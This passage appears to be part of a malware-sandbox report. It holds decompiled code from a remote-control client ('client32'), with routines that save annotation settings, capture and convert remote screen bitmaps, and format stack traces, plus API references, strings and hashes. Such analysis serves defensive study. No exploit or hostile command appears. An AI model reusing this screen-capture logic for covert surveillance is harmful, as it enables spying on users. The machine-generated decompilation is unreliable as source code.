				E1105E950( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)) + 0x34)), _t187, "Annotate", "PenWidth",  *((intOrPtr*)(__ecx + 0x11c)), 2);
				E1105E950( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)) + 0x34)), _t187, "Annotate", "FillColour",  *((intOrPtr*)(__ecx + 0x12c)), 2);
				E1105E950( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)) + 0x34)), _t187, "Annotate", "FillStyle",  *((intOrPtr*)(__ecx + 0x128)), 2);
				GetObjectA( *(__ecx + 0x184), 0x3c,  &_v68);
				_t180 = E11110230(_t187, 0x100);
				wsprintfA(_t180, "%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s", _v68, _v64, _v60, _v56, _v52, _v48 & 0x000000ff, _v47 & 0x000000ff, _v46 & 0x000000ff, _v45 & 0x000000ff, _v44 & 0x000000ff, _v43 & 0x000000ff, _v42 & 0x000000ff, _v41 & 0x000000ff,  &_v40);
				E1105E910( *((intOrPtr*)( *((intOrPtr*)(_t182 + 0x20)) + 0x34)), "Annotate", "Font", _t180, 2);
				E11162777();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t182 + 0x24)))) + 0x10))))(_t180);
				_t149 =  *((intOrPtr*)(_t182 + 0x24));
				if(_t149 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t149 + 0x110))))(1);
				}
				_t181 = DeleteObject;
				DeleteObject( *(_t182 + 0x130));
				DeleteObject( *(_t182 + 0x110));
				E11002320(_t182);
				SelectObject( *(_t182 + 0x28),  *(_t182 + 0x34));
				DeleteObject( *(_t182 + 0x30));
				DeleteDC( *(_t182 + 0x28));
				SelectObject( *(_t182 + 0x2c),  *(_t182 + 0x10c));
				DeleteObject( *(_t182 + 0x108));
				DeleteDC( *(_t182 + 0x2c));
				_t107 =  *(_t182 + 0x124);
				if(_t107 != 0) {
					DeleteObject(_t107);
				}
				_t109 =  *((intOrPtr*)(_t182 + 0x100)) +  *((intOrPtr*)(_t182 + 0x104));
				if(_t109 > 0) {
					_t129 = 0;
					if(_t109 > 0) {
						_v72 = _t182 + 0x38;
						do {
							_t119 =  *_v72;
							if(_t119 != 0) {
								DeleteObject(_t119);
							}
							_v72 =  &(_v72[1]);
							_t129 = _t129 + 1;
						} while (_t129 <  *((intOrPtr*)(_t182 + 0x104)) +  *((intOrPtr*)(_t182 + 0x100)));
					}
				}
				DeleteObject( *(_t182 + 0x17c));
				DeleteObject( *(_t182 + 0x184));
				E11088BE0( *(_t182 + 0x1c));
				_t177 =  *((intOrPtr*)( *((intOrPtr*)(_t182 + 0x20))));
				_t115 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t182 + 0x20))))))))();
				_pop(_t128);
				if(_t115 == 2 &&  *((intOrPtr*)(_t182 + 0x19c)) != _t115) {
					ShowWindow( *(_t182 + 0x1c), 9);
				}
				PostQuitMessage(0);
				return E11162BB7(1, _t128, _v8 ^ _t183, _t177, _t181, _t182);
			}

0x11005410
0x11005416
0x1100541d
0x11005422
0x1100543d
0x1100545b
0x11005479
0x11005497
0x110054b5
0x110054d3
0x110054e5
0x110054f9
0x1100553d
0x11005559
0x1100555f
0x1100556f
0x11005571
0x11005576
0x11005582
0x11005582
0x1100558a
0x11005592
0x1100559b
0x1100559f
0x110055b2
0x110055b8
0x110055be
0x110055cf
0x110055d8
0x110055de
0x110055e4
0x110055ec
0x110055ef
0x110055ef
0x110055f7
0x110055ff
0x11005601
0x11005605
0x1100560a
0x11005610
0x11005613
0x11005617
0x1100561a
0x1100561a
0x11005628
0x1100562c
0x1100562d
0x11005610
0x11005605
0x11005638
0x11005641
0x1100564d
0x11005655
0x11005659
0x1100565b
0x1100565f
0x1100566f
0x1100566f
0x11005677
0x11005691

APIs

Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975

GetObjectA.GDI32(?,0000003C,?), ref: 110054E5

Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
Part of subcall function 11110230: _memset.LIBCMT ref: 11110262

wsprintfA.USER32 ref: 1100553D
DeleteObject.GDI32(?), ref: 11005592
DeleteObject.GDI32(?), ref: 1100559B
SelectObject.GDI32(?,?), ref: 110055B2
DeleteObject.GDI32(?), ref: 110055B8
DeleteDC.GDI32(?), ref: 110055BE
SelectObject.GDI32(?,?), ref: 110055CF
DeleteObject.GDI32(?), ref: 110055D8
DeleteDC.GDI32(?), ref: 110055DE
DeleteObject.GDI32(?), ref: 110055EF
DeleteObject.GDI32(?), ref: 1100561A
DeleteObject.GDI32(?), ref: 11005638
DeleteObject.GDI32(?), ref: 11005641
ShowWindow.USER32(?,00000009), ref: 1100566F
PostQuitMessage.USER32(00000000), ref: 11005677

Strings

FillStyle, xrefs: 110054C9
PenWidth, xrefs: 1100548D
Tool, xrefs: 11005433
Font, xrefs: 1100554F
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s, xrefs: 11005537
FillColour, xrefs: 110054AB
PenColour, xrefs: 11005451
PenStyle, xrefs: 1100546F
Annotate, xrefs: 11005438, 11005456, 11005474, 11005492, 110054B0, 110054CE, 11005554

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
API String ID: 2789700732-770455996
Opcode ID: 8e64f8ddb37e5e1239a183809b03c231197a53bddf90fd82926026a352da7d30
Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
Opcode Fuzzy Hash: 8e64f8ddb37e5e1239a183809b03c231197a53bddf90fd82926026a352da7d30
Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1111D040 Relevance: 38.9, APIs: 14, Strings: 8, Instructions: 418
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1111D040(void* __ecx, signed int __edx, void* __fp0, struct HDC__* _a4) {
				signed int _v8;
				char _v208;
				char _v209;
				signed int _v216;
				int _v220;
				signed int _v224;
				signed int _v228;
				void* _v232;
				int _v236;
				int _v240;
				void* _v244;
				signed int _v248;
				signed int _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				int _v268;
				void* _v280;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t149;
				signed int _t152;
				intOrPtr _t154;
				struct HDC__* _t160;
				int _t165;
				int _t167;
				signed int _t183;
				int _t185;
				signed int _t191;
				signed int _t192;
				int _t195;
				int _t197;
				intOrPtr _t202;
				void* _t203;
				signed int _t217;
				signed int _t221;
				int _t228;
				signed int _t235;
				signed int _t254;
				int _t261;
				void* _t264;
				signed int _t265;
				int _t266;
				void* _t268;
				void* _t271;
				void* _t274;

				_t298 = __fp0;
				_t246 = __edx;
				_t149 =  *0x111ec774; // 0xcbc1010
				_t150 = _t149 ^ _t265;
				_v8 = _t149 ^ _t265;
				_t264 = __ecx;
				_t216 = __edx;
				if(( *(__ecx + 0xc0) & 0x00000001) == 0) {
					L66:
					return E11162BB7(_t150, _t216, _v8 ^ _t265, _t246, _t261, _t264);
				} else {
					if( *((intOrPtr*)(__ecx + 0x44c)) != 0) {
						_t150 = L1110FC40( *((intOrPtr*)(__ecx + 0x434)), __fp0, __edx, _a4);
					}
					_t227 =  *((intOrPtr*)(_t264 + 0x438));
					if( *((intOrPtr*)(_t264 + 0x438)) != 0 &&  *((intOrPtr*)(_t264 + 0x450)) != 0) {
						_t246 = _a4;
						_t150 = L1110FC40(_t227, _t298, _t216, _t246);
					}
					if( *((intOrPtr*)(_t264 + 0x43c)) == 1) {
						goto L66;
					}
					_t152 =  *((short*)(_t216 + 8));
					_t228 =  *(_t216 + 6) & 0x0000ffff;
					_v232 = _t152;
					asm("cdq");
					_t261 = (_t152 ^ _t246) - _t246;
					_t217 = _t216 + 0xb;
					_v236 = _t216->i & 0x0000ffff;
					_t246 =  *(_t217 - 7) & 0x0000ffff;
					_v228 = _t217;
					_v248 =  *(_t216 + 0xa) & 0x000000ff;
					_t154 =  *((intOrPtr*)(_t264 + 4));
					 *((intOrPtr*)(_t154 + 0x28)) =  *((intOrPtr*)(_t154 + 0x28)) + _t261 * _t228;
					_t216 = _a4;
					 *((intOrPtr*)(_t154 + 0x1c)) =  *((intOrPtr*)(_t154 + 0x1c)) + 1;
					 *((intOrPtr*)(_t154 + 0x2c)) =  *((intOrPtr*)(_t154 + 0x2c)) + _a4;
					_v220 = _t228;
					_v240 = _t246;
					if( *((char*)(_t264 + 0x5c6)) != 0) {
						L12:
						if( *((intOrPtr*)(_t264 + 0x440)) != 0) {
							_push(0);
							_t246 = _v232;
							_t150 = E11153730(_t228, _v232, _v248, _v228,  *((intOrPtr*)(_t264 + 0x26c)));
							_t268 = _t266 + 0x18;
							_v232 = _t150;
							if( *((intOrPtr*)(_t264 + 0x43c)) != 2) {
								if(_t150 != 0) {
									_t216 = CreateCompatibleDC( *(_t264 + 0x22c));
									if(_t216 == 0) {
										E11029A70("workdc", "..\\ctl32\\Remote.cpp", 0x3e58);
										_t268 = _t268 + 0xc;
									}
									_v244 = SelectObject(_t216, _v232);
									if( *((intOrPtr*)(_t264 + 0x1dc)) == 0) {
										_t160 =  *(_t264 + 0x22c);
									} else {
										_t160 =  *(_t264 + 0x228);
									}
									BitBlt(_t160, _v236, _v240, _v220, _t261, _t216, 0, 0, 0xcc0020);
									SelectObject(_t216, _v244);
									if( *((intOrPtr*)(_t264 + 0x43c)) != 4 &&  *((intOrPtr*)(_t264 + 0x1dc)) == 0) {
										_t165 = _v236;
										_v268 = _t165;
										_v260 = _t165 + _v220;
										_t167 = _v240;
										_v264 = _t167;
										_v256 = _t167 + _t261;
										L11113FA0(_t264,  &_v268, 0);
									}
									DeleteDC(_t216);
									_t246 = _v232;
									_t150 = DeleteObject(_v232);
								}
							} else {
								if(_t150 == 0) {
									_t150 = E11147060(_t261, "Error deleting hbmp, e=%d\n", GetLastError());
								}
							}
							goto L66;
						}
						_t216 = _v236 -  *((intOrPtr*)(_t264 + 0x5a8));
						_t150 = _t246 -  *((intOrPtr*)(_t264 + 0x5ac));
						_v244 = _t216;
						_v252 = _t150;
						if(_t216 < 0 || _t150 < 0) {
							goto L66;
						} else {
							asm("cdq");
							_t150 = ( *( *(_t264 + 0x234) + 8) ^ _t246) - _t246;
							_t246 = _v252 + _t261;
							if(_t246 > _t150) {
								goto L66;
							}
							_t150 =  *(_t264 + 0x234);
							if(_t216 >  *((intOrPtr*)( *(_t264 + 0x234) + 4))) {
								goto L66;
							}
							asm("cdq");
							_t150 = 0x100 + (_v248 * _t228 + 0x1f + _t246 >> 5) * _t261 * 4;
							_v224 = _t150;
							if( *((intOrPtr*)(_t264 + 0x43c)) == 2) {
								goto L66;
							}
							if(_t150 < 0x4000) {
								E11167010(_t150);
								_v216 = _t266;
								_v209 = 0;
								_t150 = _t266;
							} else {
								_t150 = E11163A11(_t246, _t261, _t264, _t150);
								_t266 = _t266 + 4;
								_v216 = _t150;
								_v209 = 1;
							}
							if(_t150 == 0) {
								goto L66;
							} else {
								_t216 = _t150;
								_t271 = _t266 + 8;
								if(_t216 > _v224) {
									E11029A70("cbUnpacked <= cbMax", "..\\ctl32\\Remote.cpp", 0x3ddf);
									_t271 = _t271 + 0xc;
								}
								if( *((intOrPtr*)(_t264 + 0x43c)) != 3) {
									_t183 = _t216;
									asm("cdq");
									_v224 = _t183 / _t261;
									_t185 =  *(_t264 + 0x234);
									_t221 =  *(_t185 + 0xe) & 0x0000ffff;
									asm("cdq");
									_t254 = _t183 % _t261 & 0x0000001f;
									_t235 = (_t254 +  *(_t185 + 4) * _t221 + 0x1f >> 5) + (_t254 +  *(_t185 + 4) * _t221 + 0x1f >> 5) + (_t254 +  *(_t185 + 4) * _t221 + 0x1f >> 5) + (_t254 +  *(_t185 + 4) * _t221 + 0x1f >> 5);
									asm("cdq");
									_t191 =  *(_t264 + 0x238);
									_t216 = _t235 * _v252 + ((_t254 & 0x00000007) + _t221 * _v244 >> 3) + _t191;
									_v228 = _t235;
									if(_t261 == _v232) {
										_t216 = _t216 + (_t261 - 1) * _t235;
										_v228 = _t235;
									}
									_t246 =  *(_t264 + 0x23c);
									if(_t216 > _t246) {
										wsprintfA( &_v208, "Error. b4cvt dst=%p, start=%p, end=%p\n", _t216, _t191, _t246);
										E11029A70( &_v208, "..\\ctl32\\Remote.cpp", 0x3e00);
										_t235 = _v228;
										_t271 = _t271 + 0x20;
									}
									_t192 = _v248;
									if(_t192 < 0x18) {
										if(_t192 < 0xf) {
											if(_t192 < 8) {
												if(_t192 < 4) {
													if(_t192 != 1) {
														_t150 = E11147060(_t261, "Error. Unknown colordepth %d for newscrape\n", _t192);
														if(_v209 != 0) {
															_t246 = _v216;
															_t150 = E11163AA5(_v216);
														}
														goto L66;
													}
													_t246 = _v224;
													E11117270(_v216, _t216, _v220, _t261, _v224, _t235);
													goto L44;
												}
												_t246 = _v224;
												E111171E0(_v216, _t216, _v220, _t261, _v224, _t235, 0x111ec0cc);
												_t274 = _t271 + 0x1c;
												goto L45;
											}
											_t202 =  *((intOrPtr*)(_t264 + 0x408));
											if(_t202 == 0) {
												_t203 = 0x111ec128;
											} else {
												_t203 = _t202 + 4;
											}
											_t246 = _v224;
											E111170C0(_v216, _v216, _t216, _v220, _t261, _v224, _t235, _t203);
											_t274 = _t271 + 0x1c;
											goto L45;
										}
										_t246 = _v224;
										E11116F30(_v216, _t216, _v220, _t261, _v224, _t235);
										goto L44;
									} else {
										_t246 = _v224;
										E111172D0(_v216, _t216, _v220, _t261, _v224, _t235);
										L44:
										_t274 = _t271 + 0x18;
										L45:
										_t150 =  *(_t264 + 0x23c);
										if(_t216 > _t150) {
											_t246 =  *(_t264 + 0x238);
											_t150 = wsprintfA( &_v208, "Error. cvt overflow dst=%p, start=%p, end=%p\n", _t216,  *(_t264 + 0x238), _t150);
											E11029A70( &_v208, "..\\ctl32\\Remote.cpp", 0x3e2c);
											_t274 = _t274 + 0x20;
										}
										if(_v209 != 0) {
											_t246 = _v216;
											_t150 = E11163AA5(_v216);
											_t274 = _t274 + 4;
										}
										if( *((intOrPtr*)(_t264 + 0x43c)) != 4) {
											_t195 = _v236;
											_v268 = _t195;
											_v260 = _t195 + _v220;
											_t197 = _v240;
											_v264 = _t197;
											_t246 =  &_v268;
											_v256 = _t197 + _t261;
											_t150 = L11113FA0(_t264,  &_v268, 0);
										}
										goto L66;
									}
								} else {
									if(_v209 != 0) {
										_t150 = E11163AA5(_v216);
									}
									goto L66;
								}
							}
						}
					} else {
						if(_t246 <  *(_t264 + 0x444)) {
							 *((intOrPtr*)(_t264 + 0x5cc)) =  *((intOrPtr*)(_t264 + 0x5cc)) + 1;
							 *((char*)(_t264 + 0x5c7)) = 1;
							if( *((intOrPtr*)(_t264 + 0x5d4)) != 0) {
								E11117D10(_t264, "DoNewScrape");
								_t246 = _v240;
								_t228 = _v220;
								_t266 = _t266 + 4;
							}
						}
						 *((char*)(_t264 + 0x5c5)) = 2;
						 *(_t264 + 0x444) = _t246 & 0xfffffff8;
						goto L12;
					}
				}
			}

0x1111d040
0x1111d040
0x1111d049
0x1111d04e
0x1111d050
0x1111d055
0x1111d05f
0x1111d061
0x1111d641
0x1111d657
0x1111d067
0x1111d06e
0x1111d07b
0x1111d07b
0x1111d080
0x1111d088
0x1111d093
0x1111d098
0x1111d098
0x1111d0a4
0x00000000
0x00000000
0x1111d0aa
0x1111d0ae
0x1111d0b2
0x1111d0b8
0x1111d0c1
0x1111d0c7
0x1111d0ca
0x1111d0d0
0x1111d0d4
0x1111d0df
0x1111d0e5
0x1111d0e8
0x1111d0eb
0x1111d0ee
0x1111d0f1
0x1111d0fb
0x1111d101
0x1111d107
0x1111d152
0x1111d159
0x1111d4f9
0x1111d503
0x1111d50c
0x1111d511
0x1111d51b
0x1111d521
0x1111d54d
0x1111d560
0x1111d564
0x1111d575
0x1111d57a
0x1111d57a
0x1111d592
0x1111d598
0x1111d5a2
0x1111d59a
0x1111d59a
0x1111d59a
0x1111d5c9
0x1111d5d7
0x1111d5e4
0x1111d5ef
0x1111d5f5
0x1111d603
0x1111d609
0x1111d60f
0x1111d61f
0x1111d625
0x1111d62a
0x1111d62e
0x1111d634
0x1111d63b
0x1111d63b
0x1111d523
0x1111d52c
0x1111d53e
0x1111d543
0x1111d52c
0x00000000
0x1111d521
0x1111d165
0x1111d16d
0x1111d173
0x1111d179
0x1111d181
0x00000000
0x1111d18f
0x1111d198
0x1111d19b
0x1111d1a3
0x1111d1a7
0x00000000
0x00000000
0x1111d1ad
0x1111d1b8
0x00000000
0x00000000
0x1111d1ca
0x1111d1dd
0x1111d1e4
0x1111d1ea
0x00000000
0x00000000
0x1111d1f5
0x1111d20f
0x1111d214
0x1111d21a
0x1111d221
0x1111d1f7
0x1111d1f8
0x1111d1fd
0x1111d200
0x1111d206
0x1111d206
0x1111d225
0x00000000
0x1111d22b
0x1111d238
0x1111d23a
0x1111d243
0x1111d254
0x1111d259
0x1111d259
0x1111d263
0x1111d286
0x1111d288
0x1111d28b
0x1111d291
0x1111d297
0x1111d2a4
0x1111d2a5
0x1111d2b9
0x1111d2bb
0x1111d2ca
0x1111d2d5
0x1111d2d7
0x1111d2e3
0x1111d2eb
0x1111d2ef
0x1111d2ef
0x1111d2f5
0x1111d2fd
0x1111d30e
0x1111d325
0x1111d32a
0x1111d330
0x1111d330
0x1111d333
0x1111d33c
0x1111d363
0x1111d38a
0x1111d3c6
0x1111d3f2
0x1111d4c4
0x1111d4d3
0x1111d4d9
0x1111d4e0
0x1111d4e5
0x00000000
0x1111d4d3
0x1111d3f8
0x1111d410
0x00000000
0x1111d410
0x1111d3c8
0x1111d3e5
0x1111d3ea
0x00000000
0x1111d3ea
0x1111d38c
0x1111d394
0x1111d39b
0x1111d396
0x1111d396
0x1111d396
0x1111d3a0
0x1111d3b9
0x1111d3be
0x00000000
0x1111d3be
0x1111d365
0x1111d37d
0x00000000
0x1111d33e
0x1111d33e
0x1111d356
0x1111d415
0x1111d415
0x1111d418
0x1111d418
0x1111d420
0x1111d422
0x1111d437
0x1111d44e
0x1111d453
0x1111d453
0x1111d45d
0x1111d45f
0x1111d466
0x1111d46b
0x1111d46b
0x1111d475
0x1111d47b
0x1111d481
0x1111d48f
0x1111d495
0x1111d49b
0x1111d4a3
0x1111d4ab
0x1111d4b1
0x1111d4b6
0x00000000
0x1111d475
0x1111d265
0x1111d26c
0x1111d279
0x1111d27e
0x00000000
0x1111d26c
0x1111d263
0x1111d225
0x1111d109
0x1111d10f
0x1111d111
0x1111d11e
0x1111d125
0x1111d12c
0x1111d131
0x1111d137
0x1111d13d
0x1111d13d
0x1111d125
0x1111d145
0x1111d14c
0x00000000
0x1111d14c
0x1111d107

APIs

_malloc.LIBCMT ref: 1111D1F8

Part of subcall function 11153570: _memmove.LIBCMT ref: 111535AC

wsprintfA.USER32 ref: 1111D30E
wsprintfA.USER32 ref: 1111D437
_free.LIBCMT ref: 1111D466
_free.LIBCMT ref: 1111D4E0

Part of subcall function 11153730: GetDC.USER32(00000000), ref: 11153763
Part of subcall function 11153730: CreateCompatibleDC.GDI32(00000000), ref: 11153779
Part of subcall function 11153730: SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
Part of subcall function 11153730: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
Part of subcall function 11153730: SelectObject.GDI32(00000000,00000000), ref: 1115389B

DeleteObject.GDI32(00000000), ref: 1111D524
GetLastError.KERNEL32 ref: 1111D532
CreateCompatibleDC.GDI32(?), ref: 1111D55A
_free.LIBCMT ref: 1111D279

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

SelectObject.GDI32(00000000,?), ref: 1111D585
BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 1111D5C9
SelectObject.GDI32(00000000,?), ref: 1111D5D7
DeleteDC.GDI32(00000000), ref: 1111D62E
DeleteObject.GDI32(?), ref: 1111D63B

Strings

Error deleting hbmp, e=%d, xrefs: 1111D539
Error. Unknown colordepth %d for newscrape, xrefs: 1111D4BF
Error. b4cvt dst=%p, start=%p, end=%p, xrefs: 1111D308
Error. cvt overflow dst=%p, start=%p, end=%p, xrefs: 1111D431
DoNewScrape, xrefs: 1111D127
cbUnpacked <= cbMax, xrefs: 1111D24F
..\ctl32\Remote.cpp, xrefs: 1111D24A, 1111D31F, 1111D448, 1111D56B
workdc, xrefs: 1111D570

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$CreateDelete_freewsprintf$CompatibleErrorLast$ExitMessagePaletteProcessSection_malloc_memmove
String ID: ..\ctl32\Remote.cpp$DoNewScrape$Error deleting hbmp, e=%d$Error. Unknown colordepth %d for newscrape$Error. b4cvt dst=%p, start=%p, end=%p$Error. cvt overflow dst=%p, start=%p, end=%p$cbUnpacked <= cbMax$workdc
API String ID: 2335815387-1853163823
Opcode ID: 4f613a2fe891fb06b1de0c1bc50cbb05fd11584696d30b796b8dce750a2c3026
Instruction ID: 2b9f63541b4d259c9eba475547952ab502fd0fc1a2c7f637f53db9b2787f3cd1
Opcode Fuzzy Hash: 4f613a2fe891fb06b1de0c1bc50cbb05fd11584696d30b796b8dce750a2c3026
Instruction Fuzzy Hash: BAF192B1A002169FEB24DB74CD84FDEF7B9AB44304F4485A9E55EAB244D734AE80CF61

Uniqueness

Uniqueness Score: -1.00%

Function 11144580 Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E11144580(CHAR* __ecx, intOrPtr __edi) {
				signed int _v8;
				char _v272;
				intOrPtr _v276;
				intOrPtr _v288;
				char _v292;
				char _v804;
				char _v864;
				char _v868;
				CHAR* _v872;
				signed short _v876;
				unsigned int _v880;
				char _v884;
				char _v888;
				char _v892;
				char _v896;
				char _v900;
				void* __ebx;
				void* __esi;
				signed int _t41;
				int _t46;
				intOrPtr* _t47;
				int _t48;
				int _t49;
				intOrPtr* _t50;
				int _t51;
				char _t56;
				int _t58;
				void* _t62;
				intOrPtr _t63;
				intOrPtr _t65;
				void* _t67;
				char* _t68;
				int _t69;
				signed short _t74;
				void* _t76;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t85;
				intOrPtr _t94;
				CHAR* _t95;
				CHAR* _t97;
				CHAR* _t98;
				CHAR* _t99;
				CHAR* _t100;
				signed int _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t109;
				void* _t110;

				_t94 = __edi;
				_t41 =  *0x111ec774; // 0xcbc1010
				_v8 = _t41 ^ _t102;
				_t95 = __ecx;
				_v872 = __ecx;
				E11162BE0( &_v292, 0, 0x11c);
				E11162BE0( &_v864, 0, 0x23c);
				_t76 = wsprintfA;
				_v292 = 0x18;
				_v288 = __edi;
				_v276 = 0x104;
				_v864 = 0x23c;
				_t46 = wsprintfA(_t95, "0x%08X ", __edi);
				_t79 =  *0x111f1d6c; // 0x123de80
				_t47 =  *((intOrPtr*)(_t79 + 0x3c));
				_t97 = _t46 + _v872;
				_t104 = _t103 + 0x24;
				if(_t47 == 0) {
					L8:
					_t48 = wsprintfA(_t97, "<unknown module>");
					_t105 = _t104 + 8;
					goto L9;
				} else {
					_t87 =  *((intOrPtr*)(_t79 + 4));
					_t91 =  &_v864;
					_push( &_v864);
					_push(__edi);
					_push( *((intOrPtr*)(_t79 + 4)));
					if( *_t47() == 0) {
						goto L8;
					} else {
						_t91 =  &_v804;
						_t67 = E111640B0(_t87,  &_v804, 0x5c);
						_t110 = _t104 + 8;
						if(_t67 == 0) {
							_t68 =  &_v804;
						} else {
							_t68 = _t67 + 1;
						}
						_t69 = wsprintfA(_t97, "%s", _t68);
						_t105 = _t110 + 0xc;
						_t98 =  &(_t97[_t69]);
						if( *0x111eb84c != 0) {
							_t91 =  &_v804;
							if(E111442D0( &_v804,  &_v876,  &_v880) != 0) {
								_t74 = _v876;
								_t91 = _t74 & 0x0000ffff;
								_t48 = wsprintfA(_t98, " (%d.%02d.%d.%d)", _t74 >> 0x10, _t74 & 0x0000ffff, _v880 >> 0x10, _v880 & 0x0000ffff);
								_t105 = _t105 + 0x18;
								L9:
								_t98 =  &(_t97[_t48]);
							}
						}
					}
				}
				_t49 = wsprintfA(_t98, ": ");
				_t80 =  *0x111f1d6c; // 0x123de80
				_t99 =  &(_t98[_t49]);
				_t50 =  *((intOrPtr*)(_t80 + 0x40));
				_t106 = _t105 + 8;
				if(_t50 == 0) {
					L21:
					_t51 = wsprintfA(_t99, "<unknown symbol>");
					_t107 = _t106 + 8;
					goto L22;
				} else {
					_push( &_v292);
					_t91 =  &_v868;
					_push( &_v868);
					_push(_t94);
					_push( *((intOrPtr*)(_t80 + 4)));
					if( *_t50() == 0) {
						goto L21;
					} else {
						_t56 = _v868;
						if(_t56 != 0) {
							_t58 = wsprintfA(_t99, "%s + %d bytes",  &_v272, _t56);
							_t107 = _t106 + 0x10;
						} else {
							_t58 = wsprintfA(_t99, "%s",  &_v272);
							_t107 = _t106 + 0xc;
						}
						_t85 =  *0x111f1d6c; // 0x123de80
						_t91 =  &_v868;
						_t100 =  &(_t99[_t58]);
						_v900 = 0;
						_v896 = 0;
						_v892 = 0;
						_v888 = 0;
						_v884 = 0;
						_v900 = 0x14;
						if(E111443D0(_t85, _t94,  &_v868,  &_v900) != 0) {
							_t62 = E111640B0(_t85, _v888, 0x5c);
							_t109 = _t107 + 8;
							if(_t62 == 0) {
								_t63 = _v888;
							} else {
								_t63 = _t62 + 1;
							}
							_t100 =  &(_t100[wsprintfA(_t100, ", %s, Line %d", _t63, _v892)]);
							_t65 = _v868;
							_t107 = _t109 + 0x10;
							if(_t65 != 0) {
								_t51 = wsprintfA(_t100, " + %d bytes", _t65);
								_t107 = _t107 + 0xc;
								L22:
								_t100 =  &(_t99[_t51]);
							}
						}
					}
				}
				return E11162BB7(wsprintfA(_t100, "\n") + _t100 - _v872, _t76, _v8 ^ _t102, _t91, _t94, _t100 - _v872);
			}

0x11144580
0x11144589
0x11144590
0x111445a0
0x111445a5
0x111445ab
0x111445be
0x111445c3
0x111445d0
0x111445da
0x111445e0
0x111445ea
0x111445f4
0x111445f6
0x111445fe
0x11144601
0x11144607
0x1114460c
0x111446aa
0x111446b0
0x111446b2
0x00000000
